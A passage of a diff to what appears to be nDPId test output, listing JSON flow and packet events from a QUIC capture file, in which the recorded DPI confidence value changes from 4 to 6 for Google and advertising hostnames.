kNanI86YjHvOE\/IjKudTLTEMkvMLUoZDWAtPQI+\/WYe66yUXkF7V0ZUo3ZIpLMlb5eVtuVMMe41GbHTf7qBkz676upo7ZFzgy0W42sY9gv7IriIXjYeDyZZDWo3TXCZ38h2Odbwls27Y01zUpB1YjLJf8LFOrRGSs7foRQrQDCkRPXFEc+6E+4fyYet1KpR47gVT419Ib+RJ9wJcl8ubiwrwMsSCENWlSShhkjiU9pREjVRHxJEn4uNAQz5HqwovfWEJcoieIC9oBUbwvwJMD31UWIE3vVHNJaV39UM1zitDAcHoAAw\/EaepuByZJ8czcyTY5trioI79lkjIUaQJwmyfwrWakn1mQxUudBvtAjxi8fCoWLp4XRoQiq88+b3SOVBDyWq6VLJeRBFDKqM\/C9BcOXa854dRZRXM61wBpYF32zaqLJBZ2zo0wYIk8viyYL\/mHrapgu+COKp2gV7Zvqdk13fOuL7gcwxx10cPHj+3nKWmr2kTbsXN3ZtBTVrm3"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1621495383906,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495383906,"pkt":"AAAAAAAAAAEA4PSECABFAAViG3tAAH4RcImokEAFie75AuA2AbsFTlZLwf8AAB0IkppBKZS2LWkAAEU0nZo4YZNOB4fchGmOnQKbaxZNu5+Rr9SHX\/+7nFbe3XcSn7NN4aZ8B34cI7rnBTgQPp7tDwb8aXE40NyFem3MElRtWbSgMUM8aL9mxQMt+BCtQtjknkoexLmgGym9SA4WETS+zt+sAqDuGybHtZbawAHOviOxar3NbIVfoyoECjzoxetvFQVMgJnBjFTieWPpv9GYlKtfw8vM+ABHtzCBdkVQrEtjZ2Kym5ZKNXBHERbHk7EYzIr+2EtCXPa8Zb8ZMSGVK5HAEFoUzTKCNaNkRU63dDqeoGw0HO03e3yfnEfPvmCKjFUtfo9FOxIdx7SRmN9cfYd\/5oUQ5rYUoic5STd5ys9Wj6gQeoYou3SNjAUyctcoqcQEZnGD0JnDrFdxtPksDZ5mOj9TjcCRvxSpY2BRzN1XD7P28JBy8RqTnX8VU3MUTvfBajgOzODfKpBvMnq1DnDxAJmoeuFL5GlkBD4PjdD9dOXUm8xpPRrQyN93MDy9Lh0jdKnypCUIRX+bQzDgeadkOYIZQaX60ccQFMHav4EcM87LkFI2Kkt53wfsAbzwSkC\/sh5h+SKq5tWBr0A1+3COF2lmckeKRU37IJzgJRoclYfhyc5rysBbxh\/R8QZagVscGvoIOTayHYdJgNSs+ZQPUrY4MPNmoN6JKTjH9znGk8iQeNCxiuG4V\/iY6kK6x7AHF+\/rOforM7vc9c9xJuHH84tB0GmhBnyEob1rqD1zr4gpm2RteHorokh0IIRvCPptRZoPaSZ9NqseHmcV5YB9nzZXE4EDYo5f21RhnJLRnSslkj\/H219xwcR0XpMABos3On6qE9aY\/3dpratV\/uRejtrJjhSs43oZgIHypnRSOndd2zbpHR6gwc1xqIlwmu2mdOfB5bN2SKDS9FrSjqrzVx\/YW7gsqVvZYwKID5GJDPL1+LDs4fSPxdv6XMlw2dUT14Sq6cmPktyOFMZDEpK3HY4woBwm6vbhQpvAMOjG\/cyfvzapnRKKIOQSKnlGKbaihsN4mN1DABU\/AfcDRRjAdMEtVd098nAmg10LnfyE7f03sy2ezkhaOC8JAbJCJ+a9vBBI+EmcRWBsTfEX0tClNpXHrzX9DBQjMlBsSvVL3XnUgxicHNjPexCgWSnjBlIvFbkywpKcuzQkbhTg9p+EBuDI3LT2jEBiFGiWVAx1y3mNzzHbk9D3mTlp7QoNQHrpJbKVUKG3U0qdfkUT9BiOKjC4IBDsIt8+AuPFyVhrJ41NR8s0HejzpT6naGZbPieiVEnxW02zCwTQqyslurLWiPYuYizgWR26delkajTuI6BXQG5p3YGrqA+A+Zr7i661IjrsehT8FKL\/V2MDzuE\/fP6ylibvsyekoNKqSvsdEHi89orwhxyl8c5nq\/r8IFg7NvNFyGe\/nKumTxsqUu84Wo6HMgJtg262riyvhJrlldWx+jqgnOBAU4fls6MeuW9Cq4qfm6zU4VLXh5IjH1Py8vkruKnwZ8+Xm7\/tlv\/NhWcWkrOwYFZ6bck7+PZYh+NCodWvjJkVSe5MVzgI8PZy8sRLAK9bvUjxnANGxlVZm4cGfAi5tPOM9l2JM\/1yBZrGjk15cVdpdJnrXVfidMwtlWkoPIudRiKM1qGHsus7EcmploXydZ5\/mH\/0EBq9GCTOEjPkEjEYTQWlyjMdSzxKkqwTQu+I56FkdCZnSSthnsnb7XfGlpRYLkV5VeNoKc5d4pjMVNe\/52pvZLqjGj1nZ61WYiUzCCKq0\/Mnr55qnV\/nzBawGQP496cN5M\/m"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1621495395690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495395690,"pkt":"AAAAAAAAAAEAaACzCABFAAVipg1AAH4RMnKokEAFZsLPs\/vxAbsFTg6Cyf8AAB0IgUbFpekOVCYAAEU06GZplAywEKbDCry5EETbpzZHS\/+ctZDEn8Qt8L+3XSgP\/QRbpKkvR3yjoYtHtOItTMP\/J9UsAdqCBdh2rnjFpD\/S9p5j0gqi6\/Z5LmmjTugi+3+2A56Su6KOgULzmrxxoMX8gDCxL9pwT\/\/glMxGOhJ4KTE7\/blbunZ4lQxY\/EmNDFVvwHdoRWRACFfA2iR5CCdBd+3oRtGglHNhFr484NI+Z0RCCnj6E8AMli0JlpZ0hOoK0ivmNTzcFwyySmvpxcFwAg61RSntAgfdC0AGtzo4y3UyaZFQPiRvQeQ5nDJnAqsRbTErzj9AMcpCH6TNnGDJD0Ipet45Eucx3uf3XRPDZLSwoVaO2XwE2UBC8Ypp8ROduqM0LgVHk447061aycTCZaXsHqFtEtV17WT4QoFolsGo\/UuLmbdX4fBh9oVrJJ6pOpcDVi8TH4RI3BivD2J\/kdhdSoFhpuq9YHZnkvDprncZdKcWDI0Lxyf7dDBIXI6bz3C\/x45+PMZ5I1dYqWfeP+n9Y3LOO7s6QV1unXf+WTWJninotKr714Vq9AIzRTrefbOMjhaLqyDLlF5BdYSUM5gTgoPx49oQDRPdJ7a1MBm3APpLT35YHdyilv3tfmjks4fEBltqUPxcJZgUmaDN8Rf0f9lFyt1ioE71sp+8mTyxpZ5VwhjoUvmI6EVuUtNMadIk6x7X+Na\/ZARvdabmPF6toMqDEGLm725EBI3YzGTOL\/mUoC2LE6FomE3JALJPAVmbpR4S5wvkGnqIDrYguIT1mH03jUtbD1hZrfYwo021rdvbZLGkDSbpKanoX6hwE3Xrh1lMhepvhHUBD1PwvjeXOI7ihVhjK62JiMIu8Xu\/CJCx8fRyNbu2z3w2vupOcdoe8Me++EE6n4DCv72t6GfNDeRXyJbfYF6HEwhjRaciKZIHOh3RmNhiDn948Y74LD0+AM5oAbTJWX9LP04itY9ClWH5flhojTFFOwFZGPSRv1WJb9w1NiX\/N6BELu1vs9NZqPkryvurnhZqOqcfs0xRh5Yws7xmPi75Cfr0EjgDLZmPnSK9Y2aijxhpaUW3oVEcSvgOQCztfKmRdvEfJGGR1+Ab4qZqwOtaHuFs1m3m5ld2K1YbnXeki071UWEWPHiSDavs3THubRh\/o9H82GNqi43q6kiCPUzuXIYnPl+Cn6Bp0DOI3AsGU2\/KAkOoIEJE2LFhqvu46T1GcVIcHlsWEVdPTRo4jfFS7lOaoMoNQ7tWcO86aXKUliVbxXv5NVI829JeM\/\/o0yJSZEVnCcvF7FQUmQL68fe3HTGGXZLOWm6c8wVFxl\/6Picm\/V2seHAOz1GMyw3T+bveM5m3rTBwie2mjtgPR7Yxl\/toB3aVEEDYkXEjyef9LN5zZnFChQQhZbecsd8YeFC+QCwamJ2Z23sTUHkrJ+MQqoJhxOAy\/\/Mwszyy7rcrV8gwkK31aMi30M1V3LKqHqJwnB7ugO6A1F6C9gihRhNkgUIVGt68JTdFCaAxsePYd75UEwv5xBcMHiXC3mGwQ+y4AOXGpwXeDQ5\/80Oa9w9+Ml9Rg+Isc3Ld1fmePt84drp\/daoWi9ZMQIajY2lyuqw61Alyxt59OKE3k0CpOAZduHghg0VQSWOAoUcp6o4NHFl4k3rCWuqNQa\/VkHvrA5AVBpsEMxOi5Ga9XYSlw2wK3vwxguwIpXfyLWhpqq0F0AkEDoBDw95NZlTkcuA91L8OJ790NaIAtZ2\/VKU0Ox\/ZEHiQDtz8sykDoB5BoN8A0Dq4L8aU"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1621495406541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495406541,"pkt":"AAAAAAAAAAEAguyCCABFAAViWAZAAH4RzDyokEAFdZR1HtkUAbsFTjoPw\/8AAB0IpS3BjFDLjIQANwBT7u2pdIqujeX7dANOUZTfnxYRmwoEAlv2cGTwvVRQ05f2ZqQkJC4DQmQ8UNekM\/B\/b5bCsc1E\/TyztkqJFBdbO9qB5JeKWS4bDeTB1XZ2V0ErVv64RKGTuBvdjjgCfX06su07x0Z3asXbqdCmQWMHOI1qTINqU\/oJKTNqX7IQ8f85\/qgrCdnviYFuqVMz9SBqVmpNYNfu5FP0maF7snVSzjZqhhCpRZsxX21PAu9uVnhiEb\/LUX9+7+xtXcTtey2D4GkwD4RpLMRUga1FJ4rjTGwvE0+AsvJJDdiioVoqv7\/LjuVI5T7U\/lJ3SCSYuTsqGMVwkymjUknc45YgYS64+q3tWvD9MnWpueOOG1aytIWYz\/ZQgMDZNokTq3aqJGp\/FoTSi+dPRPc1z4wXa0iO2cF402cWDgjuPmatByfDq7YBu2C9+eZYtfPRDsT4VCBhIJO5WiI7+kwTM88vMDXogMlbA3\/6bmTdrTzLvTcHCw3Xr0WehWXYo+xQSWRhu\/uuhl128v5pUOiXsl0bDy5EmHbr20S6kbHO+0LqHDJVbRf8mZ3awQ4pwAWwQWnVx37XBa\/2EtrHyyojkS2zQTcHh1fe+CoFmAvaJovW\/StICtvQrvayaHiBV733DAwKy\/Y3526K9OrAU4jsURbnovvToOxvx8drWx9RSU6gdEHnV8zWJwVS1TDnXtsWGtomfdqnhZkNK5u7kj47rGJaFqQU1bObGeviiSoviHnYR18MNvE78MR8EUodW3McLRHAztvvQBcBcNtZ9NnBwkRaprMMq72CixCPd107Y7JgoGmIJbNdeGCCwkpwtckTVEVe619QplF0gBYNsFWF5Ai1oxBkmUGx9kWUDs80leQJlP0r7jJUvcdLFEZrISVVdyQaoJZQMMFPymMKeYyC4YzW1ORpCrB6TKj0+6uYFK1klVAzDEVUYF1Hhucybp0Qq\/MxedWLGVKQWT9257chXwP2PvqI7qxShbETVSxB44evGFNEZRr76ml\/LnDy58xg1d5gvwegl\/7+gkPhbIJMtvVZ+JkXETJtQnFRG1xeTTfchP0QvUjmmxpySWiNd6gaGLNTi33HeRHy8SHIM278nUZ9GMr0cdwZ08VWlOCTuhU3E2u1I\/6ZvxNK5D41TNPq02++dEJhlyjbw3keY6r\/soji\/n+9pmP7QmojV\/lfE3GxJ+ePOip0nlns4O8V5YSSKtilDr8GhCJyf\/pzZk3drO1EwJLp4rnbhLue2grZuQbO3+kxcT96eAE85Hb0noB3Ea+uU3gj5MXJ0wkPH06qnXVxrDVuFF03yGp55TKUZyKSkRVZizQRkR0CmmMb9p+7ighEtptb4miGyv2eDl9F+SDCwhUssSw7vl8IKL3NVUcKAYGcE7Ie2BdrDpWQqSHhL0i5ZWiHn2aNx9IPMwmexAO\/AP+DEpPg\/OqQFS9+cLRPrMs6a5TPZqg++wfD+EHXSSwEIbMZk7820Ent7o0O6fPU9oivUvzxIErtdOu9fjOuTeCbtNL0U